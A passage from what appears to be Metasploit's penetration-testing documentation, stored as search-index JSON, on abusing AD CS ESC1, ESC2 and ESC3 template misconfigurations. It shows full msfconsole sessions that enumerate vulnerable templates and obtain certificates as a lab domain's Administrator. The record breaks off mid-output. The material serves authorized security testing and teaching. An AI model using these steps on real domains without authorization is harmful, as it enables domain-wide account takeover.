Therefore, all an attacker needs to do is modify this field to obtain a certificate that allows them to authenticate as any user they wish. ESC2 is similar to ESC1 in most respects, but it differs in one key area: unlike ESC1 vulnerable certificate templates, the subjectAltName field of ESC2 vulnerable certificate templates cannot be edited. Additionally, ESC2 certificate templates define the Any Purpose extended key usage (EKU) or no EKU at all. This last part is important as it allows an attacker to use the ESC2 vulnerable certificate template to create a new certificate that can be used to log into the domain via Kerberos on behalf of any other user, thereby granting them access to the domain as that user. Note that certificates with no EKU at all will need to be trusted by the NTAuthCertificates object (which they won’t be by default), otherwise new certificates created using the vulnerable ESC2 certificate template will not work for domain authentication. This restriction does not apply to those certificates vulnerable to ESC2 which have the Any Purpose EKU applied to them. Next, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU is abused, and the attacker also needs to utilize two different misconfigured certificate templates in order to exploit the vulnerability. The EKU in question this time is the Certificate Request Agent EKU, aka OID 1.3.6.1.4.1.311.20.2.1, which allows one to enroll for a certificate on behalf of another user. This may seem unusual, but it is a common scenario within Microsoft environments. To abuse this EKU, an attacker must have the following two vulnerable certificate templates: . | A certificate template which has all the same permissions as ESC1, however it also has the Certificate Request Agent EKU set on it, aka OID 1.3.6.1.4.1.311.20.2.1. 
This certificate template is labeled as ESC3_TEMPLATE_1 within the output of the ldap_esc_vulnerable_cert_finder module we will use later on. | A certificate template that allows low privileged users to enroll in it, and has manager approval disabled, same as ESC1. However it also has either: . | A template schema of 1 | A template schema of 2 or greater and an Application Policy Issuance Requirement requiring the Certificate Request Agent EKU, so that only those who have a certificate with this requirement can enroll in them. It must also define an EKU that allows for domain authentication, same as ESC1, and there must be no enrollment restrictions on the Certificate Authority (CA) server in question. This certificate template is labeled as ESC3_TEMPLATE_2 within the output of the ldap_esc_vulnerable_cert_finder module we will use later on. | . | . If both of these criteria are met, then the attacker can enroll in one of the ESC3_TEMPLATE_1 vulnerable certificate templates as a low privileged user in order to get a certificate that will grant them Certificate Request Agent permissions. They can then use these permissions to enroll in an ESC3_TEMPLATE_2 vulnerable certificate template and request a certificate on behalf of another user, such as the domain administrator, and utilize the fact that the certificate template allows for domain authentication to log into the domain via Kerberos as that user. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#introduction-to-ad-cs-vulnerabilities",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#introduction-to-ad-cs-vulnerabilities"
  },"19": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Finding Vulnerable ESC Templates Using ldap_esc_vulnerable_cert_finder",
    "content": "Before one can exploit vulnerable ESC templates to elevate privileges, it is necessary to first find a list of vulnerable templates that exist on a domain. To do this we can run the auxiliary/gather/ldap_esc_vulnerable_cert_finder module. This module will connect to the LDAP server on a target Domain Controller (DC), and will run a set of LDAP queries to gather a list of certificate authority (CA) servers and the vulnerable certificate templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out which users or groups can use that certificate template to elevate their privileges. Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13 and ESC15. The module is limited to checking for these techniques because they can be identified remotely from a normal user account by analyzing the objects in LDAP. Keep in mind, though, that there are two sets of permissions in play here. One set of permissions on the CA server controls who is able to enroll in any certificate template from that server, and a second set, applied to the certificate template itself, controls who is allowed to enroll in that specific certificate template. Therefore, the module will also specify which users are allowed to enroll in a specific template on a specific CA server, in order to make it as clear as possible which users or groups one needs to have access to in order to exploit the vulnerable certificate template. The following diagram showcases how this permissions check works in a more visual manner: . 
flowchart TD user[User] --> firstcheck{CA Server Allows Enrollment?} firstcheck{CA Server Allows Enrollment?} -- YES --> secondcheck{Certificate Template Allows Enrollment?} firstcheck{CA Server Allows Enrollment?} -- NO --> denied[Access Denied] secondcheck{Certificate Template Allows Enrollment?} -- NO --> denied[Access Denied] secondcheck{Certificate Template Allows Enrollment?} -- YES --> success[Access Granted!] . To run the module, you will need to have the login credentials of a domain joined user. The specific permissions of this user should not matter though, since most LDAP servers in an Active Directory (AD) environment are configured in such a way that they allow users to read most objects, but not write to them. For our purposes, since we just need to read the details of the certificate templates that are available, this means normal user permissions should be sufficient. To run the module, specify the login credentials for an AD user, set RHOSTS to the IP address of one of the Domain Controllers (DCs), then enter run. This will cause the module to log into the LDAP server on the target DC, and list out the vulnerable certificate templates and which CA servers they are available from, as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server: . 
msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder): Name Current Setting Required Description ---- --------------- -------- ----------- BASE_DN no LDAP base DN if you already have it DOMAIN no The domain to authenticate to PASSWORD no The password to authenticate with REPORT_NONENROLLABLE false yes Report nonenrollable certificate templates REPORT_PRIVENROLLABLE false yes Report certificate templates restricted to domain and enterprise admin RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit -framework/wiki/Using-Metasploit RPORT 389 yes The target port SSL false no Enable SSL on the LDAP connection USERNAME no The username to authenticate with View the full module info with the info, or info -d command. msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set DOMAIN DAFOREST DOMAIN => DAFOREST msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normaluser USERNAME => normaluser msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normalpass PASSWORD => normalpass msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOSTS 172.30.239.85 RHOSTS => 172.30.239.85 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run [*] Running module against 172.30.239.85 [*] Discovering base DN automatically [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] Template: ESC1-Template [*] Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC1 [*] Notes: ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 
(Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: ESC2-Template [*] Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC2 [*] Notes: ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: ESC3-Template1 [*] Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_1 [*] Notes: ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: User [*] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_2 [*] Certificate 
Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: Machine [*] Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_2 [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: ESC3-Template2 [*] Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_2 [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > . From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. 
However, whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions prevent anyone but Domain Admins and Enterprise Admins from being able to enroll in this certificate template. At that point you probably don’t need to elevate your privileges any higher, so this certificate template isn’t that useful for us. Moving on to the next certificate template, we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means that any user who is authenticated to the domain can utilize this template with an ESC1 attack to elevate their privileges. Looking at ESC2-Template we can see the same story, however this time the template is vulnerable to an ESC2 attack. ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but vulnerable to ESC3_TEMPLATE_2 attacks. We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks, and the fact that it is enrollable by Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack. Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and whose issuing CA allows any authenticated user to request it. With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the icpr_cert module to request certificates for authentication using the vulnerable certificate templates. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#finding-vulnerable-esc-templates-using-ldap_esc_vulnerable_cert_finder",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#finding-vulnerable-esc-templates-using-ldap_esc_vulnerable_cert_finder"
  },"20": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator",
    "content": "Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can. Luckily we can also do this with the icpr_cert module. We just need to also set the ALT_SID and ALT_UPN options to specify who we would like to authenticate as instead. Note that this only works with certificate templates that are vulnerable to ESC1 due to having the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set. If we know the domain name is daforest.com and the domain administrator of this domain is named Administrator we can quickly set this up: . msf6 > use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA CA => daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Template CERT_TEMPLATE => ESC1-Template msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85 RHOSTS => 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST SMBDomain => DAFOREST msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass SMBPass => normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser SMBUser => normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000 ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN [email protected] ALT_UPN => [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216143830_default_unknown_windows.ad.cs_338144.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) as the Administrator domain administrator. See the Getting A Kerberos Ticket section for more information. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator"
  },"21": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC2 To Gain Domain Administrator Privileges",
    "content": "From the previous enumeration efforts we know that the following certificate templates are vulnerable to ESC2: . | SubCA - Not exploitable as you have to be a Domain Admin or Enterprise Admin to enroll in this certificate | ESC2-Template - Enrollable by any authenticated user that is part of the Domain Users group, aka any authenticated domain user. | . We will use ESC2-Template to gain a TGT as the domain administrator user. To do this we will use the icpr_cert module and we will set the usual options, however we will need to run it twice. This is because with ESC2, we can’t use the vulnerability to request authentication certificates as other users without the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag being set on the template. Instead what we can do is use the Any Purpose EKU or SubCA EKU that are set on these certificates to authenticate to the domain as the user who requested the certificate. So what we do is first get an ESC2 vulnerable certificate, then abuse the ability to use that certificate for any purpose to then request a certificate on behalf of another user, using that certificate as the form of authentication for this operation. For the first run, we will set the usual RHOSTS, CA, and CERT_TEMPLATE details, being sure to set CERT_TEMPLATE to the vulnerable ESC2-Template certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based on the vulnerable ESC2-Template: . 
msf6 > use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85 RHOSTS => 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA CA => daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Template CERT_TEMPLATE => ESC2-Template msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST SMBDomain => DAFOREST msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass SMBPass => normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser SMBUser => normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) > show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC2-Template yes The certificate template ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\\USER) PFX no Certificate to request on behalf of RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/metas ploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) > . Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the PFX option to specify the PFX file, and the ON_BEHALF_OF setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default User certificate template should work here since it allows enrollment by any authenticated domain user. 
msf6 auxiliary(admin/dcerpc/icpr_cert) > show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC2-Template yes The certificate template ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\\USER) PFX no Certificate to request on behalf of RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/metas ploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. 
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\\\Administrator ON_BEHALF_OF => DAFOREST\\Administrator msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx PFX => /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User CERT_TEMPLATE => User msf6 auxiliary(admin/dcerpc/icpr_cert) > show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE User yes The certificate template ON_BEHALF_OF DAFOREST\\Administrator no Username to request on behalf of (format: DOMAIN\\USE R) PFX /home/gwillcox/.msf4/loot/2022 no Certificate to request on behalf of 1216154930_default_unknown_win dows.ad.cs_104207.pfx RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/me tasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) > . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) as the Administrator domain administrator. See the Getting A Kerberos Ticket section for more information. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc2-to-gain-domain-administrator-privileges",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc2-to-gain-domain-administrator-privileges"
  },"22": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC3 To Gain Domain Administrator Privileges",
    "content": "To exploit ESC3 vulnerable templates we will use a similar process to ESC2 templates, but with slightly different steps. First, let’s return to the earlier output, where we can find several templates that are vulnerable to ESC3 attacks. However, we need to split them by attack vector. The reason is that the first half of this attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1), which allows one to request certificates on behalf of other principals (such as users or computers). The second part of this attack will then require that we co-sign requests for another certificate using the certificate that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do this we will need to look for certificates in the ldap_esc_vulnerable_cert_finder module output which are labeled as being vulnerable to the ESC3_TEMPLATE_2 attack. The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template: . | ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user. | . ESC3_TEMPLATE_2 vulnerable templates are more plentiful though, and we can find a few that are of interest: . | SubCA - Again as mentioned earlier can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector. | ESC3-Template2 - Enrollable via any authenticated domain user. | User - Enrollable via any authenticated domain user. | Administrator - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector. | Machine - No real overlap between Domain Computers and Authenticated Users I don’t think? | DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector. | . 
Narrowing this list down to the templates we can actually enroll in as a normal user leaves User and ESC3-Template2 for the second part of the attack. We’ll first get the enrollment agent certificate using icpr_cert with the ESC3-Template1 template. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA yes The target certificate authority CERT_TEMPLATE User yes The certificate template ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\\USER) PFX no Certificate to request on behalf of RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framew ork/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. 
msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain DAFOREST SMBDomain =&amp;gt; DAFOREST msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA daforest-WIN-BR0CCBA815B-CA CA =&amp;gt; daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC3-Template1 CERT_TEMPLATE =&amp;gt; ESC3-Template1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216173718_default_unknown_windows.ad.cs_580032.pfx windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, we’ll use this certificate to request another certificate on behalf of a different user. For this stage we need to specify a template that is vulnerable to the ESC3_TEMPLATE_2 attack vector and that we are able to enroll in. We will use the User template for this: . 
msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx PFX =&amp;gt; /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF DAFOREST\\\\Administrator ON_BEHALF_OF =&amp;gt; DAFOREST\\Administrator msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC3-Template1 yes The certificate template ON_BEHALF_OF DAFOREST\\Administrator no Username to request on behalf of (format: DOMAIN\\USE R) PFX /home/gwillcox/.msf4/loot/2022 no Certificate to request on behalf of 1216174221_default_unknown_win dows.ad.cs_027866.pfx RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/me tasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174559_default_unknown_windows.ad.cs_570105.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . To show that the same request also works with ESC3-Template2, here is a snippet using that template: . msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC3-Template2 CERT_TEMPLATE =&amp;gt; ESC3-Template2 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC3-Template2 yes The certificate template ON_BEHALF_OF DAFOREST\\Administrator no Username to request on behalf of (format: DOMAIN\\USE R) PFX /home/gwillcox/.msf4/loot/2022 no Certificate to request on behalf of 1216174221_default_unknown_win dows.ad.cs_027866.pfx RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/me tasploit-framework/wiki/Using-Metasploit 